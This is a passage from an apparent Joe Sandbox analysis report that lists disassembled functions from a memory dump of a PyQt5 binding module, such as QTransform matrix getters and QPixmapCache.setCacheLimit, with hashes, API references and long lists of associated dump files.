Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DoubleFloat_From
String ID: QQuaternion$scalar$scalar(self) -> float
API String ID: 329246742-4033584825
Opcode ID: 59fc14935a47d114a24bbf8e9a77862103650fa064fc6c0405b2fff1c8fce54b
Instruction ID: 31b6d8dd152ba6630c318fdcfecd40584051c43e1b5f77aa57b063d307e25c41
Opcode Fuzzy Hash: 59fc14935a47d114a24bbf8e9a77862103650fa064fc6c0405b2fff1c8fce54b
Instruction Fuzzy Hash: 51012CB1A08B8AC1EB11CF75D8886A933A8FB55B94F9180B2CA5C13320DF7CD689C740

Function 00007FFB9A2F3EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A2F3F10

Strings

m33(self) -> float, xrefs: 00007FFB9A2F3F22
QTransform, xrefs: 00007FFB9A2F3F35
m33, xrefs: 00007FFB9A2F3F2E

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DoubleFloat_From
String ID: QTransform$m33$m33(self) -> float
API String ID: 329246742-641805950
Opcode ID: f462ca49106197281401547acff94f0986ba2e7941377120d25fa72e1d5ad1d5
Instruction ID: f1909250e2de6f5d4d8491fec56bc2df07a7796df8aeac022bcfa92a7650e71e
Opcode Fuzzy Hash: f462ca49106197281401547acff94f0986ba2e7941377120d25fa72e1d5ad1d5
Instruction Fuzzy Hash: EC012CB5A08F46C1EB10DF65E8886A937A8FB54B84FA140B2CE5C03320DF7DD949C380

Function 00007FFB9A311C90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

PyLong_FromUnsignedLong.PYTHON3 ref: 00007FFB9A311CDF

Strings

alpha, xrefs: 00007FFB9A311CFD
alpha(self) -> int, xrefs: 00007FFB9A311CF1
QRgba64, xrefs: 00007FFB9A311D04

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: FromLongLong_Unsigned
String ID: QRgba64$alpha$alpha(self) -> int
API String ID: 3417993445-1978412709
Opcode ID: 5109a770b60d83dc2ea33228b5b052612b8c352f9993d9dfd47978355699215f
Instruction ID: 04e183841082af64c59a6177196bf5e4cb7d232cd1cae08983edb3984f72e752
Opcode Fuzzy Hash: 5109a770b60d83dc2ea33228b5b052612b8c352f9993d9dfd47978355699215f
Instruction Fuzzy Hash: 1E014FB1B08B86C0EB50CF65E8586A937A8FB54B44F9180B2CE5C03320CF7CD59AC340

Function 00007FFB9A2F3C90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A2F3CE0

Strings

QTransform, xrefs: 00007FFB9A2F3D05
m32, xrefs: 00007FFB9A2F3CFE
m32(self) -> float, xrefs: 00007FFB9A2F3CF2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DoubleFloat_From
String ID: QTransform$m32$m32(self) -> float
API String ID: 329246742-3981345961
Opcode ID: 93f5d6cbfd27c051e03c5b1177ed63cf6f4e3c17f98bd18ed8298be2cba1d6e7
Instruction ID: 543ba80f410f99a5c235e4e9ffe9e78cedaf80d57105c7fdf6769f1b7de14655
Opcode Fuzzy Hash: 93f5d6cbfd27c051e03c5b1177ed63cf6f4e3c17f98bd18ed8298be2cba1d6e7
Instruction Fuzzy Hash: 98012CB5A08F46C0EB10DF64E8986A933B8FB55B94FA140B2CA5C03320CF7DD58AC740

Function 00007FFB9A2F59B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 25COMMON

Download Yara Rule

APIs

?setCacheLimit@QPixmapCache@@SAXH@Z.QT5GUI ref: 00007FFB9A2F59E3

Strings

QPixmapCache, xrefs: 00007FFB9A2F5A19
setCacheLimit, xrefs: 00007FFB9A2F5A12
setCacheLimit(a0: int), xrefs: 00007FFB9A2F5A06

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setCacheCache@@Limit@Pixmap
String ID: QPixmapCache$setCacheLimit$setCacheLimit(a0: int)
API String ID: 1598405161-294345867
Opcode ID: 23705bc5eb11a98b46a0ff239e2c582d992e3ecac04a7c90d0b4eed42fca5290
Instruction ID: 839998c5edbf005b93bb584d4e710bfd446139162cd0540389d959a0c9f7c138
Opcode Fuzzy Hash: 23705bc5eb11a98b46a0ff239e2c582d992e3ecac04a7c90d0b4eed42fca5290
Instruction Fuzzy Hash: E5F031B5A08A57C1EB249F25EC842A53774FB96748F9040B2DA4D13730CE7CD149C740

Function 00007FFB9A313C20 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE ref: 00007FFB9A313C66

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

??0QTextCharFormat@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFB9A313CC2
??1QTextFormat@@QEAA@XZ.QT5GUI ref: 00007FFB9A313D51
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFB9A313D6C

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Data@@Format@@ListText$?detach@?dispose@CharData@1@Data@1@@V0@@malloc
String ID:
API String ID: 2800744404-0
Opcode ID: 7a488099c114bc072305220f6a30f14b4f73cb17618688f240a13ebd0c663d90
Instruction ID: 4e0c005df3079de943f87d21913f44ac5787d1c4dac3f22809f4df8573358d95
Opcode Fuzzy Hash: 7a488099c114bc072305220f6a30f14b4f73cb17618688f240a13ebd0c663d90
Instruction Fuzzy Hash: 9A418FB2A09A45C6DB60CF28E44017DBB35FB84B95B69813ADB4D037A8DF3DD456C700

Function 00007FFB9A363EE0 Relevance: 6.1, APIs: 4, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,00007FFB9A2E59D4), ref: 00007FFB9A363F19
?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,00007FFB9A2E59D4), ref: 00007FFB9A363F2F
??0QTextCursor@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00007FFB9A2E59D4), ref: 00007FFB9A363F8F
??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00007FFB9A2E59D4), ref: 00007FFB9A363F9D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Array$?allocate@AllocationData@@Data@@@@@Flags@Option@U1@_V0@@$Cursor@@Font@@Text
String ID:
API String ID: 3532179901-0
Opcode ID: 13fe5a7e28a757d776c8d8da4c2ec6fd6b8aa9d17f9242443392562305dff6be
Instruction ID: baa40f2de6f4e16dbf210ff4b111aac6589af743d962c7efd2b3e8b5b0ef7197
Opcode Fuzzy Hash: 13fe5a7e28a757d776c8d8da4c2ec6fd6b8aa9d17f9242443392562305dff6be
Instruction Fuzzy Hash: 11318AB2609A45C6DA20CF1AE84416DB774F788F94B66812ADF0D0B764DF39D496C700

Function 00007FFB9A2F7BB0 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON3 ref: 00007FFB9A2F7BD7
??ZQTransform@@QEAAAEAV0@N@Z.QT5GUI ref: 00007FFB9A2F7C5D
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2F7C91
PyErr_Clear.PYTHON3 ref: 00007FFB9A2F7CA5

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ClearDeallocErr_SubtypeTransform@@Type_
String ID:
API String ID: 3251824037-0
Opcode ID: 72e6fd2be1454d9ff51cc08bd7963bb99d4d81db785d1ced6e308e8de8d3bcc7
Instruction ID: 4d0faeea017fb148c57d703216177262b95bc32d7746fba7f2eed25e7fdf4ce5
Opcode Fuzzy Hash: 72e6fd2be1454d9ff51cc08bd7963bb99d4d81db785d1ced6e308e8de8d3bcc7
Instruction Fuzzy Hash: A53121A6A18E5681EBA59B2AF8841697374FB89FC4F185072EF4E17B64CF3CD481D700

Function 00007FFB9A36FB60 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

?parent@QObject@@QEBAPEAV1@XZ.QT5CORE(?,?,?,00007FFB9A33E43C), ref: 00007FFB9A36FB80
?parent@QObject@@QEBAPEAV1@XZ.QT5CORE(?,?,?,00007FFB9A33E43C), ref: 00007FFB9A36FBA9
_Py_Dealloc.PYTHON3(?,?,?,00007FFB9A33E43C), ref: 00007FFB9A36FBF1
_Py_Dealloc.PYTHON3(?,?,?,00007FFB9A33E43C), ref: 00007FFB9A36FC2C

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?parent@DeallocObject@@
String ID:
API String ID: 3324210772-0
Opcode ID: 9d2952b27c56fdc781e8c47865d86e1b0740986b3b580902586abc10ea04709f
Instruction ID: aeb46731027bc9b8577e44f5d548762280a6c0c56bf9de7f4cfec7e13202a015
Opcode Fuzzy Hash: 9d2952b27c56fdc781e8c47865d86e1b0740986b3b580902586abc10ea04709f
Instruction Fuzzy Hash: E0213AA1A0EB5681EA749F26E85416973A8BB4AFC4F0844B9DE4E27B64DF7CE0419700

Function 00007FFB9A2F5C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFB9A2F5D35

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

??ZQTransform@@QEAAAEAV0@N@Z.QT5GUI ref: 00007FFB9A2F5CF2

Strings

J9d, xrefs: 00007FFB9A2F5C6C

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
